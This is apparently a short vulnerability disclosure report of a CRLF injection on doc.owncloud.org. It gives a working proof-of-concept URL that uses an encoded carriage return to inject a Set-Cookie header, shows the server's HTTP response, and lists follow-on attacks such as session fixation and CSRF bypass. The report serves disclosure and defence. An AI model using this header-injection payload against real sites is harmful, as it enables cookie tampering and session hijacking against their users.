[doc.owncloud.org] CRLF Injection

**PoC**: `http://doc.owncloud.org/%23%0dSet-Cookie:crlf=injection;domain=.owncloud.org;` **HTTP Response**: ``` HTTP/1.1 301 Moved Permanently\r\n Date: Wed, 27 Jul 2016 07:58:47 GMT\r\n Server: Apache\r\n Location: https://doc.owncloud.org/#\r < injection \r Set-Cookie:crlf=injection;domain=.owncloud.org;\r\n ``` **Result**: Creating a cookie-param "crlf=injection" on *.owncloud.org This vulnerability could be used in combination with others. For example, XSS via Cookie, bypass Double Submit Cookie csrf protection or session fixation. HTTP headers delimiter \r (%0d) is supported by any web browser other than FireFox. HTTP Strict Transport Security can block the attack, if the user has already visited the site doc.owncloud.org.